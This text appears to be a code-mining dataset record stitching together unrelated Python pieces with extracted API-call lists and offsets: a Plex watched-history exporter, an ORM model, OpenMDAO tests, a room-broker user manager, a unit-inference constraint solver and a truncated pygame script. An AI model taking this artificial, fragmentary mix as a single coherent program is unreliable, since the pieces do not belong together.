logger.info(f"Starting Export")
plex_users = plex_account.users()
# Owner will be processed separately
logger.info(f"Total Users: {len(plex_users) + 1}")
if not (len(CHECK_USERS) > 0 and plex_account.username not in CHECK_USERS and
plex_account.email not in CHECK_USERS):
logger.info(f"Processing Owner: {plex_account.username}")
user_history = _get_user_server_watched_history(plex_server)
user_history['username'] = plex_account.username
watched_history[plex_account.username] = user_history
for user_index, user in enumerate(plex_users):
if (len(CHECK_USERS) > 0 and user.username not in CHECK_USERS and
user.email not in CHECK_USERS):
continue
logger.info(f"Processing User: {user.username}")
user_server_token = user.get_token(plex_server.machineIdentifier)
try:
user_server = plexapi.server.PlexServer(PLEX_URL, user_server_token, timeout=300)
except plexapi.exceptions.Unauthorized:
# This should only happen when no libraries are shared
logger.warning(f"Skipped User with No Libraries Shared: {user.username}")
continue
user_history = _get_user_server_watched_history(user_server)
user_history['username'] = user.username
watched_history[user.username] = user_history
with open(WATCHED_HISTORY, "w") as watched_history_file:
json.dump(watched_history, watched_history_file, sort_keys=True, indent=4)
logger.info(f"Completed Export")
if __name__ == "__main__":
main()
| [
"logging.getLogger",
"plexapi.server.PlexServer",
"urllib.parse.urlparse",
"logging.Formatter",
"plexapi.CONFIG.get",
"logging.FileHandler",
"copy.deepcopy",
"json.dump"
] | [((958, 1005), 'logging.getLogger', 'logging.getLogger', (['"""PlexWatchedHistoryExporter"""'], {}), "('PlexWatchedHistoryExporter')\n", (975, 1005), False, 'import logging\n'), ((2539, 2597), 'logging.Formatter', 'logging.Formatter', ([], {'fmt': 'LOG_FORMAT', 'datefmt': 'LOG_DATE_FORMAT'}), '(fmt=LOG_FORMAT, datefmt=LOG_DATE_FORMAT)\n', (2556, 2597), False, 'import logging\n'), ((2660, 2709), 'logging.FileHandler', 'logging.FileHandler', ([], {'filename': 'LOG_FILE', 'mode': '"""a+"""'}), "(filename=LOG_FILE, mode='a+')\n", (2679, 2709), False, 'import logging\n'), ((12400, 12460), 'plexapi.server.PlexServer', 'plexapi.server.PlexServer', (['PLEX_URL', 'PLEX_TOKEN'], {'timeout': '(300)'}), '(PLEX_URL, PLEX_TOKEN, timeout=300)\n', (12425, 12460), False, 'import plexapi\n'), ((14000, 14074), 'json.dump', 'json.dump', (['watched_history', 'watched_history_file'], {'sort_keys': '(True)', 'indent': '(4)'}), '(watched_history, watched_history_file, sort_keys=True, indent=4)\n', (14009, 14074), False, 'import json\n'), ((1150, 1180), 'copy.deepcopy', 'copy.deepcopy', (['EPISODE_HISTORY'], {}), '(EPISODE_HISTORY)\n', (1163, 1180), False, 'import copy\n'), ((11676, 11703), 'copy.deepcopy', 'copy.deepcopy', (['SHOW_HISTORY'], {}), '(SHOW_HISTORY)\n', (11689, 11703), False, 'import copy\n'), ((11757, 11785), 'copy.deepcopy', 'copy.deepcopy', (['MOVIE_HISTORY'], {}), '(MOVIE_HISTORY)\n', (11770, 11785), False, 'import copy\n'), ((13466, 13533), 'plexapi.server.PlexServer', 'plexapi.server.PlexServer', (['PLEX_URL', 'user_server_token'], {'timeout': '(300)'}), '(PLEX_URL, user_server_token, timeout=300)\n', (13491, 13533), False, 'import plexapi\n'), ((6499, 6519), 'urllib.parse.urlparse', 'urlparse', (['movie_guid'], {}), '(movie_guid)\n', (6507, 6519), False, 'from urllib.parse import urlparse\n'), ((8250, 8269), 'urllib.parse.urlparse', 'urlparse', (['show_guid'], {}), '(show_guid)\n', (8258, 8269), False, 'from urllib.parse import urlparse\n'), ((1499, 1544), 
'plexapi.CONFIG.get', 'plexapi.CONFIG.get', (['key'], {'default': '""""""', 'cast': 'str'}), "(key, default='', cast=str)\n", (1517, 1544), False, 'import plexapi\n')] |
from datetime import datetime
from decimal import Decimal
from src.models import db, Required, Optional
class Product(db.Entity):
name = Required(str, unique=True)
price = Required(Decimal)
description = Optional(str)
create_time = Required(datetime, default=datetime.now, precision=6)
update_time = Optional(datetime)
def before_update(self):
self.update_time = datetime.now()
| [
"datetime.datetime.now",
"src.models.Optional",
"src.models.Required"
] | [((144, 170), 'src.models.Required', 'Required', (['str'], {'unique': '(True)'}), '(str, unique=True)\n', (152, 170), False, 'from src.models import db, Required, Optional\n'), ((183, 200), 'src.models.Required', 'Required', (['Decimal'], {}), '(Decimal)\n', (191, 200), False, 'from src.models import db, Required, Optional\n'), ((219, 232), 'src.models.Optional', 'Optional', (['str'], {}), '(str)\n', (227, 232), False, 'from src.models import db, Required, Optional\n'), ((251, 304), 'src.models.Required', 'Required', (['datetime'], {'default': 'datetime.now', 'precision': '(6)'}), '(datetime, default=datetime.now, precision=6)\n', (259, 304), False, 'from src.models import db, Required, Optional\n'), ((323, 341), 'src.models.Optional', 'Optional', (['datetime'], {}), '(datetime)\n', (331, 341), False, 'from src.models import db, Required, Optional\n'), ((399, 413), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (411, 413), False, 'from datetime import datetime\n')] |
""" Testing group-level finite difference. """
import unittest
import numpy as np
from openmdao.components.param_comp import ParamComp
from openmdao.core.component import Component
from openmdao.core.group import Group
from openmdao.core.problem import Problem
from openmdao.test.converge_diverge import ConvergeDivergeGroups
from openmdao.test.simple_comps import SimpleCompDerivMatVec
from openmdao.test.util import assert_rel_error
class TestGroupDerivatves(unittest.TestCase):
    """Tests for group-level finite-difference derivative computation."""

    def test_simple_matvec(self):
        """A group under finite difference must never call its components'
        analytic derivative methods; VerificationComp raises if they run."""

        class VerificationComp(SimpleCompDerivMatVec):

            def jacobian(self, params, unknowns, resids):
                raise RuntimeError("Derivative functions on this comp should not run.")

            def apply_linear(self, params, unknowns, dparams, dunknowns,
                             dresids, mode):
                raise RuntimeError("Derivative functions on this comp should not run.")

        sub = Group()
        sub.add('mycomp', VerificationComp())

        prob = Problem()
        prob.root = Group()
        prob.root.add('sub', sub)
        prob.root.add('x_param', ParamComp('x', 1.0))
        prob.root.connect('x_param.x', "sub.mycomp.x")

        # Force the whole subgroup to be finite-differenced as a unit.
        sub.fd_options['force_fd'] = True

        prob.setup(check=False)
        prob.run()

        # SimpleCompDerivMatVec computes y = 2*x, so dy/dx == 2 in both modes.
        J = prob.calc_gradient(['x_param.x'], ['sub.mycomp.y'], mode='fwd',
                               return_format='dict')
        assert_rel_error(self, J['sub.mycomp.y']['x_param.x'][0][0], 2.0, 1e-6)

        J = prob.calc_gradient(['x_param.x'], ['sub.mycomp.y'], mode='rev',
                               return_format='dict')
        assert_rel_error(self, J['sub.mycomp.y']['x_param.x'][0][0], 2.0, 1e-6)

    def test_converge_diverge_groups(self):
        """Gradient through a nested converge/diverge topology, fwd and rev."""
        prob = Problem()
        prob.root = Group()
        prob.root.add('sub', ConvergeDivergeGroups())

        param_list = ['sub.p.x']
        unknown_list = ['sub.comp7.y1']

        prob.setup(check=False)
        prob.run()

        # Reference value -40.75 comes from the known ConvergeDiverge model.
        J = prob.calc_gradient(param_list, unknown_list, mode='fwd', return_format='dict')
        assert_rel_error(self, J['sub.comp7.y1']['sub.p.x'][0][0], -40.75, 1e-6)

        J = prob.calc_gradient(param_list, unknown_list, mode='rev', return_format='dict')
        assert_rel_error(self, J['sub.comp7.y1']['sub.p.x'][0][0], -40.75, 1e-6)

    def test_group_fd(self):
        """Finite difference over a middle subgroup in a chain of comps."""

        class SimpleComp(Component):
            """ A simple component that provides derivatives. """

            def __init__(self):
                super(SimpleComp, self).__init__()

                # Params
                self.add_param('x', 2.0)

                # Unknowns
                self.add_output('y', 0.0)

            def solve_nonlinear(self, params, unknowns, resids):
                """ Doesn't do much.  Just multiply by 3"""
                unknowns['y'] = 3.0*params['x']

            def jacobian(self, params, unknowns, resids):
                """Analytical derivatives."""
                J = {}
                J[('y', 'x')] = 3.0
                return J

        class Model(Group):
            """ Simple model to experiment with finite difference."""

            def __init__(self):
                super(Model, self).__init__()

                self.add('px', ParamComp('x', 2.0))

                self.add('comp1', SimpleComp())
                sub = self.add('sub', Group())
                sub.add('comp2', SimpleComp())
                sub.add('comp3', SimpleComp())
                self.add('comp4', SimpleComp())

                self.connect('px.x', 'comp1.x')
                self.connect('comp1.y', 'sub.comp2.x')
                self.connect('sub.comp2.y', 'sub.comp3.x')
                self.connect('sub.comp3.y', 'comp4.x')

                # Only the middle subgroup is finite-differenced.
                self.sub.fd_options['force_fd'] = True

        prob = Problem()
        prob.root = Model()

        prob.setup(check=False)
        prob.run()

        # Chain of four y = 3*x stages: dy/dx = 3**4 = 81.
        J = prob.calc_gradient(['px.x'], ['comp4.y'])
        assert_rel_error(self, J[0][0], 81.0, 1e-6)
# Allow running this test module directly as a script.
if __name__ == "__main__":
    unittest.main()
| [
"openmdao.components.param_comp.ParamComp",
"openmdao.core.problem.Problem",
"openmdao.test.converge_diverge.ConvergeDivergeGroups",
"openmdao.core.group.Group",
"openmdao.test.util.assert_rel_error",
"unittest.main"
] | [((4041, 4056), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4054, 4056), False, 'import unittest\n'), ((945, 952), 'openmdao.core.group.Group', 'Group', ([], {}), '()\n', (950, 952), False, 'from openmdao.core.group import Group\n'), ((1015, 1024), 'openmdao.core.problem.Problem', 'Problem', ([], {}), '()\n', (1022, 1024), False, 'from openmdao.core.problem import Problem\n'), ((1045, 1052), 'openmdao.core.group.Group', 'Group', ([], {}), '()\n', (1050, 1052), False, 'from openmdao.core.group import Group\n'), ((1427, 1499), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', "J['sub.mycomp.y']['x_param.x'][0][0]", '(2.0)', '(1e-06)'], {}), "(self, J['sub.mycomp.y']['x_param.x'][0][0], 2.0, 1e-06)\n", (1443, 1499), False, 'from openmdao.test.util import assert_rel_error\n'), ((1636, 1708), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', "J['sub.mycomp.y']['x_param.x'][0][0]", '(2.0)', '(1e-06)'], {}), "(self, J['sub.mycomp.y']['x_param.x'][0][0], 2.0, 1e-06)\n", (1652, 1708), False, 'from openmdao.test.util import assert_rel_error\n'), ((1769, 1778), 'openmdao.core.problem.Problem', 'Problem', ([], {}), '()\n', (1776, 1778), False, 'from openmdao.core.problem import Problem\n'), ((1799, 1806), 'openmdao.core.group.Group', 'Group', ([], {}), '()\n', (1804, 1806), False, 'from openmdao.core.group import Group\n'), ((2087, 2160), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', "J['sub.comp7.y1']['sub.p.x'][0][0]", '(-40.75)', '(1e-06)'], {}), "(self, J['sub.comp7.y1']['sub.p.x'][0][0], -40.75, 1e-06)\n", (2103, 2160), False, 'from openmdao.test.util import assert_rel_error\n'), ((2260, 2333), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', "J['sub.comp7.y1']['sub.p.x'][0][0]", '(-40.75)', '(1e-06)'], {}), "(self, J['sub.comp7.y1']['sub.p.x'][0][0], -40.75, 1e-06)\n", (2276, 2333), False, 'from openmdao.test.util import assert_rel_error\n'), ((3811, 3820), 
'openmdao.core.problem.Problem', 'Problem', ([], {}), '()\n', (3818, 3820), False, 'from openmdao.core.problem import Problem\n'), ((3964, 4008), 'openmdao.test.util.assert_rel_error', 'assert_rel_error', (['self', 'J[0][0]', '(81.0)', '(1e-06)'], {}), '(self, J[0][0], 81.0, 1e-06)\n', (3980, 4008), False, 'from openmdao.test.util import assert_rel_error\n'), ((1120, 1139), 'openmdao.components.param_comp.ParamComp', 'ParamComp', (['"""x"""', '(1.0)'], {}), "('x', 1.0)\n", (1129, 1139), False, 'from openmdao.components.param_comp import ParamComp\n'), ((1836, 1859), 'openmdao.test.converge_diverge.ConvergeDivergeGroups', 'ConvergeDivergeGroups', ([], {}), '()\n', (1857, 1859), False, 'from openmdao.test.converge_diverge import ConvergeDivergeGroups\n'), ((3262, 3281), 'openmdao.components.param_comp.ParamComp', 'ParamComp', (['"""x"""', '(2.0)'], {}), "('x', 2.0)\n", (3271, 3281), False, 'from openmdao.components.param_comp import ParamComp\n'), ((3370, 3377), 'openmdao.core.group.Group', 'Group', ([], {}), '()\n', (3375, 3377), False, 'from openmdao.core.group import Group\n')] |
from __future__ import absolute_import
import ujson
from rsbroker.core.upstream import RTCWebSocketClient
class BaseUserManager(object):
    """Abstract manager that tracks users per room and their socket handlers.

    NOTE(review): ``room_to_uid`` and ``uid_to_handler`` are *class-level*
    mutable dicts, so every instance (and every subclass) shares the same
    state -- confirm this sharing is intentional before adding instances.
    """

    # room id -> set of uids currently checked into that room (shared state).
    room_to_uid = {}
    # uid -> connection handler object for that user (shared state).
    uid_to_handler = {}

    def register(self, obj):
        """
        Dispatch all resource which user need!
        :param obj: connection handler exposing ``room`` and ``uid``
        :return:
        """
        raise NotImplementedError

    def unregister(self, obj):
        """
        Release all resource if user out!
        :param obj: connection handler exposing ``room`` and ``uid``
        :return:
        """
        raise NotImplementedError

    def send(self, request):
        """
        Send news to room-server by web socket!
        :param request: a dict type
            Example:
                {
                    'method': 'check_in',
                    'uid': uid
                }
        :return: a dict type
            Example:
                {
                    'status': '100',
                    'mid': '1001',
                    'body': {'info':'check in failure'}
                }
        """
        raise NotImplementedError
class UserManager(BaseUserManager):
    """
    Concrete user manager: checks users in/out with the room server over the
    upstream web socket and keeps the local room/uid indexes in sync.
    """
    def register(self, obj):
        """Check the user in with the room server and index the handler.

        :param obj: connection handler exposing ``room`` and ``uid``
        :raises ValueError: if the server rejects the check-in (mid '1001')
        """
        room = obj.room
        uid = obj.uid
        request = {'method': 'check_in', 'uid': uid}
        response = self.send(request)
        data = ujson.loads(response)
        mid = data.get("mid")
        if mid == "1001":
            # check in failure
            raise ValueError("Check in failure, no source for uid [%s]" % uid)
        # Bug fix: the original only added the uid when the room already
        # existed; the first user of a new room was left untracked.
        self.room_to_uid.setdefault(room, set()).add(uid)
        self.uid_to_handler[uid] = obj

    def unregister(self, obj):
        """Check the user out with the room server and drop local state.

        :param obj: connection handler exposing ``room`` and ``uid``
        :raises ValueError: if the server reports check-out failure (mid '1003')
        """
        room = obj.room
        uid = obj.uid
        # Bug fix: the request previously said 'check_in' (copy/paste from
        # register); the reply handling (mid '1003' = check-out failure)
        # shows the intended method is 'check_out'.
        request = {'method': 'check_out', 'uid': uid}
        response = self.send(request)
        data = ujson.loads(response)
        mid = data.get("mid")
        if mid == '1003':
            raise ValueError("Check out failure, the user may already check out!")
        if room in self.room_to_uid:
            # discard() instead of remove(): tolerate a double-unregister.
            self.room_to_uid[room].discard(uid)
        if uid in self.uid_to_handler:
            # Bug fix: was 'self.uid_to_handle' (AttributeError at runtime).
            del self.uid_to_handler[uid]
| [
"ujson.loads"
] | [((1291, 1312), 'ujson.loads', 'ujson.loads', (['response'], {}), '(response)\n', (1302, 1312), False, 'import ujson\n'), ((1880, 1901), 'ujson.loads', 'ujson.loads', (['response'], {}), '(response)\n', (1891, 1901), False, 'import ujson\n')] |
from pgm.pgmplayer import PGMPlayer
import cps_constraints as con
from operator import itemgetter
import uuid
import os
class ConstraintSolver:
    """Infers probable physical units for program variables.

    For each candidate unit it builds a factor graph (written to a temporary
    ``.fg`` file), runs marginal inference via :class:`PGMPlayer`, and
    aggregates per-variable unit probabilities into
    ``con.variable2unitproba``.  All constraint inputs come from the shared
    ``cps_constraints`` module (imported as ``con``).
    """

    def __init__(self, my_con_collector, my_con_scoper, SHOULD_USE_CONSTRAINT_SCOPING=False):
        """
        :param my_con_collector: collector that gathered the constraints
        :param my_con_scoper: scoper that can exclude out-of-scope constraints
        :param SHOULD_USE_CONSTRAINT_SCOPING: enable scoper-based exclusion
        """
        self.con_collector = my_con_collector
        self.con_scoper = my_con_scoper
        self.SHOULD_PRINT_VARIABLE_TYPES = False
        self.SHOULD_USE_CONSTRAINT_SCOPING = SHOULD_USE_CONSTRAINT_SCOPING
        self.ENABLE_SCOPER = False
        # (token, name, unit-string) -> PGM variable name, and its inverse.
        self.pred2pgmvar = {}
        self.pgmvar2pred = {}
        # Unique suffix so concurrent runs don't clobber each other's .fg files.
        self.uuid = str(uuid.uuid4())

    def solve(self):
        """Run inference once per candidate unit; return and also store the
        mapping ``(token, name) -> [(unit, probability), ...]`` sorted by
        descending probability."""
        #print con.units
        #print con.non_unit_variables
        #print "Dimensionless:"
        #print con.dimensionless_variables
        self.pred2pgmvar = {}
        self.pgmvar2pred = {}
        var2unitproba = {}
        for unit in con.units:
            # One factor-graph file per unit, removed after inference.
            fg_filename = "pgm/predict_" + str(unit).replace(" ", "") + self.uuid + ".fg"
            player = self.prepare(fg_filename, unit)
            pgmvar2proba = player.compute_marginals()
            #print {v.name: '%.4f' % (1.0 - p) for v, p in pgmvar2proba.items()}
            os.remove(fg_filename)
            for pred, pgmvar in self.pred2pgmvar.items():
                self.pgmvar2pred[pgmvar] = pred
            #print '---------------------'
            #print 'Probabilistic Units:'
            #print '---------------------'
            for v, p in pgmvar2proba.items():
                if v.name in self.pgmvar2pred:
                    (token, name, u) = self.pgmvar2pred[v.name]
                    #print '%s: %s = %s = %.4f' % (v.name, name, unit, 1.0-p)
                    # The player reports P(var = 0); store 1 - p as P(unit).
                    if (token, name) in var2unitproba:
                        var2unitproba[(token, name)].append((unit, 1.0-p))
                    else:
                        var2unitproba[(token, name)] = [(unit, 1.0-p)]
            #print '---------------------' + '\n'
        for v in var2unitproba:
            # Best-scoring unit first; 0.5 means "no evidence", skip printing.
            var2unitproba[v].sort(key=itemgetter(1), reverse=True)
            if (var2unitproba[v][0][1] == 0.5):
                continue
            if self.SHOULD_PRINT_VARIABLE_TYPES:
                print('%s:\n%s\n' % (v[1], var2unitproba[v]))
        con.variable2unitproba = var2unitproba
        #con.reset_constraints()
        return var2unitproba

    def prepare(self, fg_filename, unit):
        """Build the factor graph for one candidate unit from all five
        constraint families and return the ready-to-run player."""
        if self.SHOULD_USE_CONSTRAINT_SCOPING and self.con_scoper.constraint_scope_list:
            self.ENABLE_SCOPER = True
        player = PGMPlayer(fg_filename)
        self.process_nm_constraints(player, unit)
        self.process_cu_constraints(player, unit)
        self.process_df_constraints(player, unit)
        self.process_cf_constraints(player, unit)
        self.process_ks_constraints(player, unit)
        return player

    def process_nm_constraints(self, pgm_player, unit):
        """Add naming-based factors: evidence that a variable's name suggests
        this unit ('n' node) implies the unit prediction ('p' node)."""
        for var, nm_con in con.naming_constraints.items():
            (lt, lname, unitprobalist) = nm_con
            var = con.variables.get((lt.variable, lname))
            if var:
                nv = 'n'+ str(var)
                pv = 'p'+ str(var)
                p = 0.0
                # Probability the name implies *this* unit, if listed.
                for (un, pr) in unitprobalist:
                    if (un == unit):
                        p = pr
                        break
                pgm_player.add_factor(left=[], right=[nv],
                                      states=[0, 1],
                                      proba=p,
                                      comment=nv + ' = 1')
                pgm_player.add_factor(left=[nv], right=[pv],
                                      states=[1, 0, 1, 1],
                                      proba=0.7,
                                      comment=nv + ' -> ' + pv)
                #print nv + ': (' + lname + ', ' + str(unit) + ', ' + str(p) + ')'
                #print nv + ' -> ' + pv
                if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
                    self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv

    def process_cu_constraints(self, pgm_player, unit):
        """Add computed-unit factors ('c' nodes): units derived from
        expressions that assign to the variable, plus derived constraints."""
        for var, cu_con in con.computed_unit_constraints.items():
            (lt, lname, units, isKnown) = cu_con[0]
            var = con.variables.get((lt.variable, lname))
            if var:
                cv = 'c'+ str(var)
                pv = 'p'+ str(var)
                p = 0.0
                # Stronger implication when real ROS units were found.
                p_fwd = 0.95 if con.found_ros_units else 0.7
                no_factor = False
                for (t, n, un, isKnown) in cu_con:
                    if self.ENABLE_SCOPER and self.con_scoper.should_exclude_constraint([t]):
                        continue
                    if con.should_exclude_constraint((t, n, un, isKnown)):
                        no_factor = True
                        continue
                    if (unit in un):
                        # Known units give certainty; inferred ones 0.8.
                        p = 1.0 if isKnown else 0.8
                        if isKnown:
                            break
                if no_factor and p == 0.0:
                    continue
                pgm_player.add_factor(left=[], right=[cv],
                                      states=[0, 1],
                                      proba=p,
                                      comment=cv + ' = 1')
                pgm_player.add_factor(left=[cv], right=[pv],
                                      states=[1, 0, 1, 1],
                                      proba=p_fwd,
                                      comment=cv + ' -> ' + pv)
                #print cv + ' = 1: (' + lname + ', ' + str(unit) + ', ' + str(p) + ')'
                #print cv + ' -> ' + pv
                if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
                    self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv
        # Same factor shape for derived computed-unit constraints.
        for (lt, lname, un, isKnown) in con.derived_cu_constraints:
            var = con.variables.get((lt.variable, lname))
            if var:
                cv = 'c'+ str(var)
                pv = 'p'+ str(var)
                p = 0.0
                p_fwd = 0.95 if con.found_ros_units else 0.7
                if (unit == un):
                    p = 1.0 if isKnown else 0.8
                pgm_player.add_factor(left=[], right=[cv],
                                      states=[0, 1],
                                      proba=p,
                                      comment=cv + ' = 1')
                pgm_player.add_factor(left=[cv], right=[pv],
                                      states=[1, 0, 1, 1],
                                      proba=p_fwd,
                                      comment=cv + ' -> ' + pv)
                #print cv + ' = 1: (' + lname + ', ' + str(unit) + ', ' + str(p) + ')'
                #print cv + ' -> ' + pv
                if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
                    self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv

    def process_df_constraints(self, pgm_player, unit):
        """Add dataflow factors: two distinct variables linked by dataflow
        imply each other's unit; when one side's unit is known, it becomes
        direct evidence ('d' node) for the other."""
        for (lt, lname, rt, rname, df_type) in con.df_constraints:
            if self.ENABLE_SCOPER and self.con_scoper.should_exclude_constraint([lt, rt]):
                continue
            var1 = con.variables.get((lt.variable, lname))
            var2 = con.variables.get((rt.variable, rname))
            if var1 and var2 and (var1 != var2):
                pv1 = 'p'+ str(var1)
                pv2 = 'p'+ str(var2)
                # Bidirectional implication between the two predictions.
                pgm_player.add_factor(left=[pv1], right=[pv2],
                                      states=[1, 0, 1, 1],
                                      proba=0.95,
                                      comment=pv1 + ' -> ' + pv2)
                pgm_player.add_factor(left=[pv2], right=[pv1],
                                      states=[1, 0, 1, 1],
                                      proba=0.95,
                                      comment=pv2 + ' -> ' + pv1)
                #print pv1 + ' -> ' + pv2
                #print pv2 + ' -> ' + pv1
                if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
                    self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv1
                if (rt.variable, rname, str(unit)) not in self.pred2pgmvar:
                    self.pred2pgmvar[(rt.variable, rname, str(unit))] = pv2
            else:
                if lt.isKnown and (not rt.isKnown):
                    dv2 = 'd'+ str(var2)
                    pv2 = 'p'+ str(var2)
                    # Evidence only when the known side carries this unit.
                    p = 0.95 if (lt.units[0] == unit) else 0.0
                    pgm_player.add_factor(left=[], right=[dv2],
                                          states=[0, 1],
                                          proba=p,
                                          comment=dv2 + ' = 1')
                    pgm_player.add_factor(left=[dv2], right=[pv2],
                                          states=[1, 0, 1, 1],
                                          proba=0.95,
                                          comment=dv2 + ' -> ' + pv2)
                    #print dv2 + ' = 1: (' + rname + ', ' + str(unit) + ', ' + str(p) + ')'
                    #print dv2 + ' -> ' + pv2
                    if (rt.variable, rname, str(unit)) not in self.pred2pgmvar:
                        self.pred2pgmvar[(rt.variable, rname, str(unit))] = pv2
                elif rt.isKnown and (not lt.isKnown):
                    dv1 = 'd'+ str(var1)
                    pv1 = 'p'+ str(var1)
                    p = 0.95 if (rt.units[0] == unit) else 0.0
                    pgm_player.add_factor(left=[], right=[dv1],
                                          states=[0, 1],
                                          proba=p,
                                          comment=dv1 + ' = 1')
                    pgm_player.add_factor(left=[dv1], right=[pv1],
                                          states=[1, 0, 1, 1],
                                          proba=0.95,
                                          comment=dv1 + ' -> ' + pv1)
                    #print dv1 + ' = 1: (' + lname + ', ' + str(unit) + ', ' + str(p) + ')'
                    #print dv1 + ' -> ' + pv1
                    if (lt.variable, lname, str(unit)) not in self.pred2pgmvar:
                        self.pred2pgmvar[(lt.variable, lname, str(unit))] = pv1

    def process_cf_constraints(self, pgm_player, unit):
        """Add conversion-factor factors ('f' nodes): variables multiplied by
        known conversion constants suggest the corresponding unit."""
        for (t, name, units, cf_type) in con.conversion_factor_constraints:
            var = con.variables.get((t.variable, name))
            if var:
                fv = 'f'+ str(var)
                pv = 'p'+ str(var)
                p = 0.0
                if (units[0] == unit):
                    # CF_3 constraints are treated as slightly stronger.
                    p = 0.95 if (cf_type == con.CF_3) else 0.9
                pgm_player.add_factor(left=[], right=[fv],
                                      states=[0, 1],
                                      proba=p,
                                      comment=fv + ' = 1')
                pgm_player.add_factor(left=[fv], right=[pv],
                                      states=[1, 0, 1, 1],
                                      proba=0.95,
                                      comment=fv + ' -> ' + pv)
                #print fv + ' = 1: (' + name + ', ' + str(unit) + ', ' + str(p) + ')'
                #print fv + ' -> ' + pv
                if (t.variable, name, str(unit)) not in self.pred2pgmvar:
                    self.pred2pgmvar[(t.variable, name, str(unit))] = pv

    def process_ks_constraints(self, pgm_player, unit):
        """Add known-symbol factors ('k' nodes): symbols with documented
        units provide strong evidence for this unit."""
        for var, ks_con in con.known_symbol_constraints.items():
            (token, name, units) = ks_con[0]
            var = con.variables.get((token.variable, name))
            if var:
                kv = 'k'+ str(var)
                pv = 'p'+ str(var)
                p = 0.0
                # NOTE(review): p is reset each iteration, so only the *last*
                # entry of ks_con decides the evidence -- confirm intended.
                for (t, n, un) in ks_con:
                    p = 0.0
                    if (un[0] == unit):
                        p = 0.95
                pgm_player.add_factor(left=[], right=[kv],
                                      states=[0, 1],
                                      proba=p,
                                      comment=kv + ' = 1')
                pgm_player.add_factor(left=[kv], right=[pv],
                                      states=[1, 0, 1, 1],
                                      proba=0.95,
                                      comment=kv + ' -> ' + pv)
                #print kv + ' = 1: (' + name + ', ' + str(unit) + ', ' + str(p) + ')'
                #print kv + ' -> ' + pv
                if (token.variable, name, str(unit)) not in self.pred2pgmvar:
                    self.pred2pgmvar[(token.variable, name, str(unit))] = pv
| [
"cps_constraints.known_symbol_constraints.items",
"cps_constraints.computed_unit_constraints.items",
"cps_constraints.variables.get",
"operator.itemgetter",
"uuid.uuid4",
"cps_constraints.naming_constraints.items",
"cps_constraints.should_exclude_constraint",
"pgm.pgmplayer.PGMPlayer",
"os.remove"
] | [((2521, 2543), 'pgm.pgmplayer.PGMPlayer', 'PGMPlayer', (['fg_filename'], {}), '(fg_filename)\n', (2530, 2543), False, 'from pgm.pgmplayer import PGMPlayer\n'), ((2911, 2941), 'cps_constraints.naming_constraints.items', 'con.naming_constraints.items', ([], {}), '()\n', (2939, 2941), True, 'import cps_constraints as con\n'), ((4160, 4197), 'cps_constraints.computed_unit_constraints.items', 'con.computed_unit_constraints.items', ([], {}), '()\n', (4195, 4197), True, 'import cps_constraints as con\n'), ((11571, 11607), 'cps_constraints.known_symbol_constraints.items', 'con.known_symbol_constraints.items', ([], {}), '()\n', (11605, 11607), True, 'import cps_constraints as con\n'), ((569, 581), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (579, 581), False, 'import uuid\n'), ((1162, 1184), 'os.remove', 'os.remove', (['fg_filename'], {}), '(fg_filename)\n', (1171, 1184), False, 'import os\n'), ((3009, 3048), 'cps_constraints.variables.get', 'con.variables.get', (['(lt.variable, lname)'], {}), '((lt.variable, lname))\n', (3026, 3048), True, 'import cps_constraints as con\n'), ((4269, 4308), 'cps_constraints.variables.get', 'con.variables.get', (['(lt.variable, lname)'], {}), '((lt.variable, lname))\n', (4286, 4308), True, 'import cps_constraints as con\n'), ((5898, 5937), 'cps_constraints.variables.get', 'con.variables.get', (['(lt.variable, lname)'], {}), '((lt.variable, lname))\n', (5915, 5937), True, 'import cps_constraints as con\n'), ((7205, 7244), 'cps_constraints.variables.get', 'con.variables.get', (['(lt.variable, lname)'], {}), '((lt.variable, lname))\n', (7222, 7244), True, 'import cps_constraints as con\n'), ((7264, 7303), 'cps_constraints.variables.get', 'con.variables.get', (['(rt.variable, rname)'], {}), '((rt.variable, rname))\n', (7281, 7303), True, 'import cps_constraints as con\n'), ((10504, 10541), 'cps_constraints.variables.get', 'con.variables.get', (['(t.variable, name)'], {}), '((t.variable, name))\n', (10521, 10541), True, 'import 
cps_constraints as con\n'), ((11672, 11713), 'cps_constraints.variables.get', 'con.variables.get', (['(token.variable, name)'], {}), '((token.variable, name))\n', (11689, 11713), True, 'import cps_constraints as con\n'), ((2010, 2023), 'operator.itemgetter', 'itemgetter', (['(1)'], {}), '(1)\n', (2020, 2023), False, 'from operator import itemgetter\n'), ((4719, 4769), 'cps_constraints.should_exclude_constraint', 'con.should_exclude_constraint', (['(t, n, un, isKnown)'], {}), '((t, n, un, isKnown))\n', (4748, 4769), True, 'import cps_constraints as con\n')] |
import time
import random
import pygame
import pygame.midi
import numpy as np
from typing import Tuple
__author__ = "<NAME>"
# Edge length of one grid cell / the avatar square, in pixels.
AV_SIZE = 20
# Window dimensions: a 30 x 30 grid of AV_SIZE cells.
WIN_X = 30 * AV_SIZE
WIN_Y = 30 * AV_SIZE
# Window diagonal; used to normalise avatar-to-target distance into [0, 1].
DIFF_MAX = np.sqrt(WIN_X**2 + WIN_Y**2)
def adapt_avatar_position(event, user_x_pos:int, user_y_pos:int) -> Tuple[int, int]:
    """Move the avatar one grid cell per arrow-key press.

    Movement is clamped so the avatar square always stays fully inside the
    window.  Non-keydown events (and non-arrow keys) leave the position
    unchanged.

    :param event: pygame event to interpret
    :param user_x_pos: current avatar x position in pixels
    :param user_y_pos: current avatar y position in pixels
    :return: the (possibly updated) (x, y) position
    """
    if event.type == pygame.KEYDOWN:
        if event.key == pygame.K_LEFT and user_x_pos >= AV_SIZE:
            user_x_pos -= AV_SIZE
        elif event.key == pygame.K_RIGHT and user_x_pos < WIN_X - AV_SIZE:
            user_x_pos += AV_SIZE
